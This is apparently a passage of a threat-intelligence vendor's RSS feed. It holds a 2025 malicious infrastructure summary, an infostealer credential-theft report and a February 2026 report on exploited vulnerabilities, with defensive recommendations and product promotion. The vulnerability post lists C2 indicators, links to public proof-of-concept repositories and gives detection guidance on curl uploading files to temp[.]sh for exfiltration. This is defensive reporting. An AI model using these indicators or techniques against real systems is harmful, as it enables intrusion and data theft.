          <li>Infostealers remained the primary infection vector in 2025, with malware-as-a-service (MaaS)offerings dominating. Vidar outperformed competitors, Lumma proved resilient despite law enforcement and doxxing pressure, and the wider ecosystem remained highly volatile.</li>
          <li>Cobalt Strike retained clear dominance in OST detections (~50%) despite declining share, while Metasploit and Mythic held their positions. RedGuard, Ligolo, and Supershell expanded notably, and jQuery again led as the most prevalent malleable C2 profile by detections and geographic reach.</li>
          <li>The malware ecosystem remained anchored in MaaS and open-source tooling across desktop and mobile, with AsyncRAT and Quasar RAT leading the RAT landscape, DcRAT and REMCOS RAT gaining share, and families such as XWorm, SectopRAT, and GOSAR entering the top tier, while Android dominated mobile activity (nine of the top ten families) amid rising use of mercenary spyware.</li>
          <li>Droppers, loaders, and TDS remained dynamic but resilient in 2025, with high loader turnover following Operation Endgame 2024, driven by Latrodectus expansion and the rise of MintsLoader and GrayBravo’s CastleLoader, alongside sustained and widespread TDS activity linked to TAG-124, GrayCharlie, and other threat actors.</li>
          <li>Lastly, in 2025, Insikt Group pivoted to identifying TAEs via the Threat Density List, highlighting high-risk networks such as Virtualine Technologies, often transiting via aurologic GmbH, that sustained operations through Regional Internet Registry (RIR) resource abuse and rapid rebranding despite sanctions and law enforcement pressure.</li>
        </ul>
        <h2>Background</h2>
        <p>Insikt Group proactively identifies and monitors infrastructure linked to hundreds of malware families,threat actors, and related artifacts, including phishing kits, scanners, and relay networks. Through daily,automated validation using proprietary methods, Insikt Group delivers accurate risk representation,enabling Recorded Future customers to strengthen their detection and defense capabilities.</p>
        <p>Building on Insikt Group’s annual malicious infrastructure reports from <a href="https://www.recordedfuture.com/ko/research/2022-adversary-infrastructure-report">2022</a>, <a href="https://www.recordedfuture.com/ko/research/2023-adversary-infrastructure-report">2023</a>, and <a href="https://www.recordedfuture.com/ko/research/2024-malicious-infrastructure-report">2024</a>, this year’s report delivers a concise, data-driven overview of malicious infrastructure observed throughout 2025. While the percentages presented throughout the report are intended to provide insight into trends and the state of malicious infrastructure in 2025, it is important to note that Insikt Group continuously adds new detections for both existing and emerging families, which makes year-over-year comparisons imperfect.</p>
        <p>This year, the focus continues to be on the synergy between passive infrastructure detection,<br />higher-tier infrastructure insights powered by <a href="https://support.recordedfuture.com/hc/en-us/articles/360020582674-Recorded-Future-Network-Intelligence">Recorded Future Network Intelligence</a>, and victim<br />identification. It also expands to examine trends across the ecosystem of TAEs that underpin cyber threats, including how sanctions against selected entities have reshaped that landscape. Overall, this report is intended for anyone interested in malicious infrastructure, providing a high-level overview of its current state along with summaries of key findings to support informed decision-making and offer a broad perspective on this rapidly evolving landscape.</p>
        <p>Recognizing the challenge of categorizing malware types in a mutually exclusive manner due to their overlapping functionalities, this report establishes a set of malware categories to facilitate analysis, as detailed in Appendix A, with brief definitions for each. Notably, certain malware categories, such as crypters, have been intentionally excluded because they typically lack network artifacts.</p>
        <p>Beyond examining malicious infrastructure through the lens of malware categories, Insikt Group also monitors it by type, assigning each a distinct risk score within the Recorded Future Intelligence Operations Platform®. This differentiation reflects varying levels of severity. For instance, network traffic to or from a C2 server in a corporate network may indicate a higher risk compared to the presence of a management panel, as the former typically implies active malicious activity. The infrastructure types defined by Insikt Group are detailed in Appendix B.</p>
        <p><a href="https://assets.recordedfuture.com/insikt-report-pdfs/2026/cta-2026-0319.pdf">Download the full report</a></p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_1c826d2a3e8f6fd7496b1368f37ed9a99ce300731.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[2025 Identity Threat Landscape Report: Inside the Infostealer Economy: Credential Threats in 2025]]></title>
            <link>https://www.recordedfuture.com/ko/blog/identity-trend-report-march-blog</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/identity-trend-report-march-blog</guid>
            <pubDate>Mon, 16 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Recorded Future's 2025 Identity Threat Landscape Report analyzes hundreds of millions of compromised credentials to reveal how infostealer malware is evolving, which systems attackers are targeting, and what security teams must do to get ahead of credential-based breaches.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Credential theft is the dominant initial access vector for enterprise breaches. In 2025, Recorded Future detected:</p>
        <ul>
          <li>1.95 billion malware combo list credential exposures</li>
          <li>36 million database combo list credential exposures</li>
          <li>24 million database dump credential exposures</li>
          <li>892 million malware log credential exposures</li>
        </ul>
        <p>Five findings stand out from the data:</p>
        <ol>
          <li><strong>Credential theft accelerated as the year progressed.</strong> Recorded Future identified 50% more credentials in the second half of 2025 than in the first half of the year. 90% more credentials were identified in the last three months of the year than in the first three months</li>
          <li><strong>Stolen credentials are targeted, not random.</strong> Of the 7 million credentials indexed with identifiable authorization URLs, 63.2% were tied to authentication systems. VPNs, RMM tools, cloud platforms, and detection software also featured prominently — meaning attackers are often going directly for the systems that provide the broadest access and, in some cases, the ability to blind security teams entirely.</li>
          <li><strong>Infostealer malware is outpacing traditional breach detection.</strong> Each compromised device yielded an average of 87 stolen credentials. The scale and precision of modern infostealers means a single infected endpoint — including a personal device used to access corporate systems — can expose an entire organization.</li>
          <li><strong>MFA alone is no longer sufficient protection.</strong> 276 million of the credentials indexed in 2025 included active session cookies, meaning attackers can bypass multi-factor authentication entirely. This represents 31% of all malware-sourced credentials.</li>
          <li><strong>Detection speed is the decisive advantage.</strong> Over half of all credentials (53%) were indexed within one week of exfiltration, and 36.4% within 24 hours. Organizations that act on intelligence quickly can intervene before stolen credentials are exploited.</li>
        </ol>
        <h2>The Scale of the Problem: Compromised Credentials in 2025</h2>
        <h3>Volume Grew Throughout the Year</h3>
        <p>Credential compromise from malware logs was not a static risk in 2025 — it compounded. Recorded Future observed a consistent upward trend throughout the year, with the second half producing 50% more indexed credentials than the first.</p>
        <p>The final three months of the year were particularly active: They saw 90% more volume than the first three months, reflecting both the continued proliferation of infostealer malware-as-a-service (MaaS) and the disruption and reformation of major malware families mid-year (covered in detail in the malware section below).</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_100437fc59ff266567d6d895e1cfa0d0d64a78e6c.png?width=750&amp;format=png&amp;optimize=medium" width="1024" height="434" />
            </div>
          </div>
          <div>
            <div>CHART 1: Monthly credential volume from malware logs, full year 2025 (Source: Recorded Future)</div>
          </div>
        </div>
        <p>What this means for security teams: Seasonal or quarterly threat reviews are insufficient. The volume and pace of credential exposure in 2025 demands continuous monitoring — not periodic audits.</p>
        <h3>What do Those Credentials Actually Unlock?</h3>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a62ce422e875506eaab3067aac23093b66512971.png?width=750&amp;format=png&amp;optimize=medium" width="932" height="599" />
            </div>
          </div>
          <div>
            <div>CHART 2: Top authorization URL categories, 2025 (Source: Recorded Future)</div>
          </div>
        </div>
        <p>More credentials exposed means more doors open to attackers. The authorization URL data from 2025 reveals exactly which doors they're targeting — and the picture is stark.</p>
        <p>Of the 7 million credentials with high-risk authorization URLs indexed in 2025, 63.2% were tied to authentication systems. The next largest categories were web content management (9.95%) and cloud computing (7.58%), followed by remote monitoring and management tools (6.19%) and email infrastructure (3.87%).</p>
        <p>This is not a random distribution. Authentication systems, cloud platforms, and remote access tools — VPNs at 2.4% and RMM tools at 6.19% — are precisely the systems that give attackers the broadest foothold inside an organization. A single stolen credential for an authentication portal or VPN can serve as the entry point for lateral movement, privilege escalation, and ultimately a full breach.</p>
        <p>The presence of detection and response software (1.17%) and SIEM platforms (0.06%) in this list is particularly notable. Credentials for the tools organizations rely on to detect attacks are themselves being stolen — giving attackers the ability to blind security teams before they strike.</p>
        <p>What this means for security teams: The value of a stolen credential is determined by what it unlocks. Prioritize monitoring and rapid response for credentials tied to authentication systems, remote access tools, cloud infrastructure, and security platforms — these can represent the highest-leverage targets for attackers operating with stolen credentials.</p>
        <h3>A Global Problem With Regional Concentration</h3>
        <p>Compromised credentials were indexed from organizations across the globe. The ten countries with the highest credential volume in 2025 were:</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1b91e7f35209bbe3196cde31382adc2ead95cc599.png?width=750&amp;format=png&amp;optimize=medium" width="740" height="477" />
            </div>
          </div>
          <div>
            <div>Table 1: Credentials indexed by country (Source: Recorded Future)</div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1ca316c640ac71930edee449150b110dace9a3120.png?width=750&amp;format=png&amp;optimize=medium" width="1024" height="590" />
            </div>
          </div>
          <div>
            <div>MAP 1: Credentials indexed by country (Source: Recorded Future)</div>
          </div>
        </div>
        <p>The breadth of this data underscores that credential theft is not concentrated in a single region or industry — it is a universal risk. Organizations with global workforces, multinational supply chains, or international customer bases face exposure across multiple geographies simultaneously.</p>
        <h2>The Anatomy of a Compromise: What Attackers Actually Steal</h2>
        <h3>87 Credentials Per Device</h3>
        <p>When an employee's device is infected with infostealer malware, the damage rarely stops at one account. In 2025, the average compromised device yielded 87 stolen credentials — spanning corporate applications, personal accounts, and cloud services accessed from the same machine.</p>
        <p>Recorded Future's Compromised Host Incident Reports surface the full scope of each device-level infection, including the malware family responsible, file paths, IP addresses, and infection timelines. This context is what separates actionable intelligence from a list of leaked passwords.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_18e329ab6afb10fd7fcfa888764ed37e99a49b591.png?width=750&amp;format=png&amp;optimize=medium" width="1532" height="1600" />
            </div>
          </div>
          <div>
            <div>Image 1: Incident Report results in Recorded Future <a href="https://www.recordedfuture.com/ko/products/identity-intelligence">Identity Intelligence</a></div>
          </div>
        </div>
        <p>What this means for security teams: A single alert should trigger a device-level incident response, not just a password reset. Understanding what else was on that machine — and what else may have been exfiltrated — is essential to containing the full extent of the exposure.</p>
        <h3>The Cookie Problem: Why MFA Isn't Enough</h3>
        <p>One of the most significant findings from 2025 is the volume of credentials that included active session cookies alongside stolen passwords. Recorded Future indexed 276 million credentials with cookies — 31% of all malware-sourced credentials — a figure that grew 30% from the first half of the year to the second half.</p>
        <p>Session cookies allow attackers to authenticate as a user without entering a password or completing an MFA challenge. They effectively render secondary authentication controls irrelevant for as long as the session remains active.</p>
        <p>December was the single highest month for cookie-bearing credential exposure, indexing 18% more than the next highest month (November).</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_179d0293bed7183e9a44a23b2349ec0d9380d8e99.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="741" />
            </div>
          </div>
          <div>
            <div>CHART 3: Monthly volume of credentials with cookies, 2025 (Source: Recorded Future)</div>
          </div>
        </div>
        <p>What this means for security teams: MFA enrollment is necessary but not sufficient. Organizations should monitor for session cookie theft specifically, enforce shorter session token lifespans for high-risk applications, and treat any credential exposure from an infostealer log as a potential authentication bypass — not just a password reset trigger.</p>
        <h2>The Infostealer Ecosystem: How the Malware Landscape Shifted in 2025</h2>
        <h3>LummaC2: The Year's Dominant Threat</h3>
        <p>LummaStealer emerged as the most widely deployed infostealer of 2025. Operating under a malware-as-a-service model since late 2022, it matured significantly over the past year, targeting Windows systems to harvest browser credentials, session cookies, cryptocurrency wallets, and two-factor authentication tokens.</p>
        <p>Its distribution relied heavily on social engineering — fake software downloads and "ClickFix" techniques that trick users into executing malicious commands disguised as CAPTCHA challenges. Recent campaigns used CastleLoader for delivery, running obfuscated payloads in memory to evade detection.</p>
        <p>In May 2025, a coordinated law enforcement action neutralized more than 2,300 LummaC2 command-and-control domains. The disruption was significant — but not fatal. LummaStealer operators migrated to bulletproof hosting services and employed sophisticated sandbox evasion techniques, including trigonometric analysis of mouse movements to avoid automated detection environments. Activity continued under private, select-affiliate operations through the remainder of the year.</p>
        <h3>How the Rest of the Ecosystem Responded</h3>
        <p>The 2025 infostealer landscape was shaped as much by law enforcement disruption as by attacker innovation. Each takedown created a vacuum that other malware families quickly filled.</p>
        <p>Early 2025: The late-2024 law enforcement actions against RedLine and META pushed users toward emerging MaaS alternatives, consolidating volume around LummaC2 and accelerating its dominance through Q2.</p>
        <p>Mid-2025: Following the LummaC2 disruption in May, established families — Rhadamanthys, Vidar, and StealC — absorbed the displaced activity. Rhadamanthys led through the summer until its own infrastructure was taken down by law enforcement in November 2025. Vidar stepped into the lead position thereafter.</p>
        <p>Rebranding as a survival strategy: Disruption prompted reinvention. StealC relaunched as StealC v2. Vidar operators attempted a similar rebrand. These moves reflect a deliberate effort by malware developers to obscure continuity and frustrate attribution.</p>
        <p>macOS: Atomic macOS Stealer (AMOS) dominated the macOS market through most of 2025, disappearing in October before returning in February 2026. MacSync (formerly Mac.C) emerged as the primary commodity macOS infostealer by year end.</p>
        <p>Private operations grew: Increased law enforcement pressure on publicly accessible MaaS tools pushed sophisticated threat actors toward private infostealers with restricted affiliate access. Acreed (also known as ACR Stealer) and Odyssey Stealer represented the most significant private-operation families of 2025. Private Lumma operations also continued post-disruption.</p>
        <p>What this means for security teams: Malware family names change. Takedowns create temporary disruption, not permanent resolution. Organizations that track exposure by malware family rather than only by leaked credential volume will be better positioned to understand the true source and scope of each incident.</p>
        <h2>Recommendations for Security Teams</h2>
        <p>The 2025 data points to four areas where security teams can meaningfully reduce their exposure to credential-based attacks.</p>
        <p>1. Extend monitoring to personal devices. The majority of infostealer infections occur on personal devices used to access corporate systems — a risk that endpoint detection tools and traditional perimeter controls cannot address. Monitoring infostealer malware logs directly provides visibility into these exposures before they are weaponized.</p>
        <p>One large automotive parts distributor found that Recorded Future surfaced stolen credentials tied to an employee's personal device — an exposure their existing tools had no visibility into and would likely never have caught.</p>
        <p>2. Treat session cookie exposure as a critical-severity event. With 276 million credentials carrying active cookies in 2025, any infostealer-sourced credential exposure should trigger immediate session invalidation in addition to a password reset. MFA bypass via stolen cookies is not a theoretical threat — it is an observed, frequent attack pattern.</p>
        <p>3. Automate response workflows to close the detection-to-remediation gap. The data shows that most credentials are indexed within days of theft. Organizations that have pre-built response playbooks — automatically checking Active Directory, clearing sessions, forcing resets, and notifying managers — respond in minutes rather than hours.</p>
        <p>"We created a custom SOAR playbook using the Identity Intelligence module. This playbook takes the information of compromised corporate user accounts, runs an Active Directory check for the credentials, clears user sessions and resets the password if the account is found to be compromised. It also notifies the user's manager for email response. To date, we have processed over 330 different identity alerts. " — Bryan Cassidy, Lead Cyber Defense Engineer, 7-Eleven (<a href="https://app.userevidence.com/assets/2701BQGV">UserEvidence</a>)</p>
        <p>4. Monitor your entire domain footprint — including subsidiaries and third parties. Some of the most consequential exposures in 2025 involved obscure subsidiaries and supply chain partners, not core corporate domains. Attackers do not limit themselves to obvious targets. Security teams shouldn't limit their monitoring to obvious domains either.</p>
        <p>One large international financial services firm detected an infostealer on a third-party service provider's machine through Recorded Future — surfacing a supply chain exposure that would have been invisible through traditional monitoring alone.</p>
        <h2>The Recorded Future Advantage: Detection Speed – From Exfiltration to Alert in Hours</h2>
        <p>The gap between when credentials are stolen and when a security team finds out is where breaches happen. Most organizations discover compromised credentials days or weeks after the fact — through a public breach disclosure, a tip from law enforcement, or an incident that's already underway.</p>
        <p>Recorded Future closes that gap. In 2025, 36.4% of all indexed credentials were detected within 24 hours of exfiltration, and 52.9% within one week. By the time stolen credentials are being traded or weaponized, Recorded Future customers have already been alerted.</p>
        <div>
          <div>
            <div>Credential Exfiltration Breakdown</div>
          </div>
          <div>
            <div>Within 24 hours</div>
            <div>36%</div>
          </div>
          <div>
            <div>Within 1 week</div>
            <div>53%</div>
          </div>
          <div>
            <div>Within 1 month</div>
            <div>85%</div>
          </div>
          <div>
            <div>Within 1 year</div>
            <div>99%</div>
          </div>
          <div>
            <div>Over 1 year</div>
            <div>1%</div>
          </div>
        </div>
        <p>Table 2: Exfiltration freshness breakdown (Source: Recorded Future)</p>
        <p>Speed matters because attackers move fast. Infostealer logs are often listed for sale within hours of collection. Every day between exfiltration and detection is a day an attacker may already have access. The 15.3% of credentials not detected within a month illustrate what happens when that window stays open — extended attacker dwell time, lateral movement, and incidents that escalate into major breaches.</p>
        <p>For Recorded Future customers, early detection is only half the equation. Pre-built integrations with Okta, Microsoft Entra ID, and SOAR platforms like XSOAR mean that when a credential alert fires, automated workflows can clear sessions, force password resets, and notify managers — without waiting for an analyst to pick up the ticket.</p>
        <p>A large international financial services firm's Team Lead described a recent credential leak: identified and escalated in under 24 hours, triggering immediate automated remediation — exactly the outcome their team had built toward.</p>
        <h2>Appendix: Notable Passwords from 2025 Credential Exposures</h2>
        <p>The following passwords appeared most frequently across credentials indexed by Recorded Future in 2025. Their prevalence reflects the continued gap between password policies and actual user behavior — and the reason why credential monitoring cannot rely on password complexity alone as a proxy for risk.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1f94cdabb3370ab7cf99bcab6358d5be3aa72aad0.png?width=750&amp;format=png&amp;optimize=medium" width="1306" height="312" />
        </p>
        <h2>About This Report</h2>
        <p>This report is based on data indexed by Recorded Future's Identity Intelligence Module across the full calendar year 2025. Recorded Future monitors credentials across open web, dark web, paste sites, Telegram channels, and infostealer malware logs sourced from 30+ malware families. All credential data can be processed and analyzed without storing plaintext passwords in customer-facing systems.</p>
        <h2>Find out What’s Already Exposed in Your Environment</h2>
        <p>The data in this report reflects the broader threat landscape. The question is how much of it applies to your organization specifically.</p>
        <p>Recorded Future's complimentary Identity Exposure Assessment pulls directly from the Recorded Future Intelligence Graph to show you the volume, recency, and severity of your organization's credential exposure over the past year — including compromised employee credentials, infostealer-sourced data, and how your exposure has trended over time.</p>
        <p>There's no commitment required. Just a clear picture of where your organization stands.</p>
        <p><a href="https://pages.recordedfutureext.com/IdentityExposureReport_LandingPage.html">Get your complimentary Identity Exposure Assessment →</a></p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1546ac0dd95673dede4cdd0ced6a52f34d677471c.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[February 2026 CVE Landscape: 13 Critical Vulnerabilities Mark 43% Drop from January]]></title>
            <link>https://www.recordedfuture.com/ko/blog/february-2026-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/february-2026-cve-landscape</guid>
            <pubDate>Thu, 12 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[February 2026 saw a 43% decrease in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 13 vulnerabilities requiring immediate remediation, down from 23 in January 2026.]]></description>
            <content:encoded><![CDATA[
        <p>February 2026 saw a 43% decrease in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying <strong>13 vulnerabilities</strong> requiring immediate remediation, down from <a href="https://www.recordedfuture.com/ko/blog/january-2026-cve-landscape">23 in January 2026</a>. All 13 carried a ‘Very Critical’ Recorded Future Risk Score.</p>
        <p><strong>What security teams need to know:</strong></p>
        <ul>
          <li><strong>Microsoft dominates:</strong> Six of 13 vulnerabilities affected Microsoft products, accounting for 46% of February's findings; all were added to CISA's KEV catalog on the same day</li>
          <li><strong>Supply-chain attack on Notepad++:</strong> Lotus Blossom, a suspected China state-sponsored threat actor, exploited CVE-2025-15556 to hijack Notepad++'s update channel and deliver a Cobalt Strike Beacon and the Chrysalis backdoor</li>
          <li><strong>APT28 exploits MSHTML flaw:</strong> The Russian state-sponsored group leveraged CVE-2026-21513 via malicious Windows Shortcut files for multi-stage payload delivery</li>
          <li><strong>Public exploits available:</strong> Four of 13 vulnerabilities have publicly available proof-of-concept code; an alleged exploit for a fifth is being advertised for sale</li>
        </ul>
        <p><strong>Bottom line:</strong> Despite a 43% drop in volume, February's vulnerabilities include named threat actor exploitation and five RCE-enabling flaws, making prioritized, intelligence-driven remediation as important as ever.</p>
        <h2><strong>Quick Reference: February 2026 Vulnerability Table</strong></h2>
        <p><em>All 13 vulnerabilities below were actively exploited in February 2026.</em></p>
        <div>
          <div>
            <div><strong>#</strong></div>
            <div><strong>Vulnerability</strong></div>
            <div><strong>Risk</strong><br /><strong>Score</strong></div>
            <div><strong>Affected Vendor/Product</strong></div>
            <div><strong>Vulnerability Type/Component</strong></div>
            <div><strong>Public PoC</strong></div>
          </div>
          <div>
            <div>1</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BD2JXlW/overview">CVE-2025-15556</a></div>
            <div>99</div>
            <div>Notepad++</div>
            <div>CWE-494 (Download of Code Without Integrity Check)</div>
            <div><a href="https://github.com/George0Papasotiriou/CVE-2025-15556-Notepad-WinGUp-Updater-RCE">Yes</a></div>
          </div>
          <div>
            <div>2</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BECGjWe/overview">CVE-2026-1731</a></div>
            <div>99</div>
            <div>BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA)</div>
            <div>CWE-78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'))</div>
            <div><a href="https://github.com/win3zz/CVE-2026-1731">Yes</a></div>
          </div>
          <div>
            <div>3</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEF-/overview">CVE-2026-21510</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-693 (Protection Mechanism Failure)</div>
            <div>No</div>
          </div>
          <div>
            <div>4</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEGB/overview">CVE-2026-21513</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-693 (Protection Mechanism Failure)</div>
            <div>No</div>
          </div>
          <div>
            <div>5</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEGC/overview">CVE-2026-21514</a></div>
            <div>99</div>
            <div>Microsoft Office</div>
            <div>CWE-807 (Reliance on Untrusted Inputs in a Security Decision)</div>
            <div>No</div>
          </div>
          <div>
            <div>6</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEGG/overview">CVE-2026-21519</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-843 (Access of Resource Using Incompatible Type ('Type Confusion'))</div>
            <div>No</div>
          </div>
          <div>
            <div>7</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEGJ/overview">CVE-2026-21525</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-476 (NULL Pointer Dereference)</div>
            <div>No</div>
          </div>
          <div>
            <div>8</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEGN/overview">CVE-2026-21533</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-269 (Improper Privilege Management)</div>
            <div>*Yes</div>
          </div>
          <div>
            <div>9</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEPyPC6/overview">CVE-2026-20700</a></div>
            <div>99</div>
            <div>Apple iOS, macOS, tvOS, watchOS, and visionOS</div>
            <div>CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer)</div>
            <div>No</div>
          </div>
          <div>
            <div>10</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEThw_R/overview">CVE-2026-25108</a></div>
            <div>99</div>
            <div>Soliton Systems K.K. FileZen</div>
            <div>CWE-78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'))</div>
            <div>No</div>
          </div>
          <div>
            <div>11</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BC48fmD/overview">CVE-2026-2441</a></div>
            <div>99</div>
            <div>Google Chromium</div>
            <div>CWE-416 (Use After Free)</div>
            <div><a href="https://github.com/huseyinstif/CVE-2026-2441-PoC">Yes</a></div>
          </div>
          <div>
            <div>12</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEdM197/overview">CVE-2026-22769</a></div>
            <div>99</div>
            <div>Dell RecoverPoint for Virtual Machines (RP4VMs)</div>
            <div>CWE-798 (Use of Hard-coded Credentials)</div>
            <div>No</div>
          </div>
          <div>
            <div>13</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEzsB0i/overview">CVE-2026-20127</a></div>
            <div>99</div>
            <div>Cisco Catalyst SD-WAN Controller and Manager</div>
            <div>CWE-287 (Improper Authentication)</div>
            <div><a href="https://github.com/search?q=CVE-2026-20127&amp;type=repositories">Yes</a></div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>List of vulnerabilities that were actively exploited in February based on Recorded Future data. *An alleged exploit for</em> <em><a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEGN/overview">CVE-2026-21533</a></em> <em>is being advertised for sale across Github. Recorded Future Triage was used to browse the website advertising the exploit, which can be</em> <em><a href="https://tria.ge/260305-bl376shz8w/behavioral1#:~:text=v16-,Replay%20Monitor,-Downloads">viewed here</a></em> <em>via the Replay Monitor. (Source: Recorded Future)</em></p>
        <h2><strong>Key Trends: February 2026</strong></h2>
        <h3><strong>Vendors Most Affected</strong></h3>
        <ul>
          <li><strong>Microsoft</strong> led with six vulnerabilities across Windows, Windows Server, Office, and Microsoft 365 products</li>
          <li><strong>BeyondTrust</strong> faced a critical OS command injection flaw in Remote Support (RS) versions 25.3.1 and earlier, and Privileged Remote Access (PRA) versions 24.3.4 and earlier</li>
          <li><strong>Cisco</strong> saw active exploitation of an authentication bypass in Catalyst SD-WAN infrastructure</li>
          <li>Additional affected vendors: Notepad++, Apple, Soliton Systems K.K., Google, and Dell</li>
        </ul>
        <h3><strong>Most Common Weakness Types</strong></h3>
        <ul>
          <li><strong>CWE-78</strong> – OS Command Injection (tied for most common)</li>
          <li><strong>CWE-693</strong> – Protection Mechanism Failure (tied for most common)</li>
          <li><strong>CWE-476</strong> – NULL Pointer Dereference</li>
          <li><strong>CWE-843</strong> – Type Confusion</li>
          <li><strong>CWE-807</strong> – Reliance on Untrusted Inputs in a Security Decision</li>
        </ul>
        <h3><strong>Exploitation Activity</strong></h3>
        <p><strong>Vulnerabilities associated with malware campaigns:</strong></p>
        <ul>
          <li><strong>Lotus Blossom</strong> (suspected China state-sponsored) exploited <strong>CVE-2025-15556</strong> to hijack Notepad++ update traffic between June and December 2025. The campaign rotated C2 servers across three attack chains to deliver a Metasploit loader, Cobalt Strike Beacon, and a custom backdoor called Chrysalis.</li>
          <li><strong>APT28</strong> (Russian state-sponsored) exploited <strong>CVE-2026-21513</strong> using malicious Windows Shortcut (.lnk) files with embedded HTML payloads for multi-stage payload delivery, with observed network communication to infrastructure associated with the threat group.</li>
          <li><strong>UNC6201</strong> (suspected China-nexus) exploited <strong>CVE-2026-22769</strong> to compromise Dell RecoverPoint for VMs appliances, deploying the SLAYSTYLE web shell, BRICKSTORM backdoor, and GRIMBOLT, a C#-based backdoor with native AOT compilation to complicate detection.</li>
        </ul>
        <p><strong>Long-running exploitation activity:</strong></p>
        <ul>
          <li><strong>UAT-8616</strong> exploited <strong>CVE-2026-20127</strong>, chaining it with CVE-2022-20775 to achieve root-level access on Cisco Catalyst SD-WAN systems, with <a href="https://blog.talosintelligence.com/uat-8616-sd-wan/">Cisco Talos attributing</a> the activity to a sophisticated threat actor and assessing that the activity dates back to at least 2023.</li>
        </ul>
        <h2><strong>Priority Alert: Active Exploitation</strong></h2>
        <p>These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.</p>
        <h3>CVE-2025-15556 | Notepad++</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: Added February 12, 2026</p>
        <p><strong>Why this matters:</strong> Lotus Blossom exploited this flaw to replace legitimate Notepad++ update packages with malicious installers, deploying Cobalt Strike and the Chrysalis backdoor to targeted users over a six-month period. The vulnerability affects the WinGUp updater used by Notepad++ versions prior to 8.8.9, which fails to cryptographically verify downloaded update metadata and installers.</p>
        <p><strong>Affected versions:</strong> Notepad++ versions prior to 8.8.9 (version 8.9.1 recommended)</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Update to Notepad++ version 8.9.1, released January 26, 2026</li>
          <li>Hunt for the malicious update.exe sample (SHA256: 4d4aec6120290e21778c1b14c94aa6ebff3b0816fb6798495dc2eae165db4566) in your environment</li>
          <li>Monitor for GUP.exe spawning unexpected child processes</li>
          <li>Review network connections for traffic to 45[.]76[.]155[.]202, 45[.]77[.]31[.]210, 45[.]32[.]144[.]255, or 95[.]179[.]213[.]0</li>
          <li>Check for directories named ProShow under %APPDATA% or unexpected files in %APPDATA%\Adobe\Scripts\</li>
          <li>Block or alert on curl.exe uploading files to temp[.]sh</li>
        </ul>
        <p><strong>Known C2 infrastructure:</strong> 45[.]76[.]155[.]202, 45[.]77[.]31[.]210, cdncheck[.]it[.]com, safe-dns[.]it[.]com, 95[.]179[.]213[.]0</p>
        <p><strong>Detection resources:</strong> Insikt Group created Sigma rules to detect update.exe's execution of reconnaissance commands (whoami, tasklist, systeminfo, and netstat -ano) and curl commands for system information exfiltration, available to Recorded Future customers.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_155577ae992ec4ffecd3c5a7fa077ece6041dcb4c.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="801" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>Risk Rules History from</em> <em><a href="https://www.recordedfuture.com/ko/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2025-15556 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
